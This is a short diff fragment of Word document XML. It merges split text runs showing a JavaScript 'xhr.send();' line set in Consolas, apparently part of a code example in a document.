-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhr.send();</w:t>
             </w:r>
           </w:p>
           <w:p>

</xml_diff>